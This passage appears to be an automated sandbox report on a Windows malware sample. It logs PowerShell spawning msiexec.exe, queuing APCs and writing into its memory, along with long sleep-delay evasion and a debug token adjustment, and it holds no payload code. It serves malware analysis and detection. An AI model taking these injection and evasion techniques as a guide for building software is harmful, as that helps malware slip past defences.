    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6459Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3280Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2656Thread sleep time: -110000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3884234699.00000000047AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
    Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeAPI call chain: ExitProcess graph end nodegraph_0-3650
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
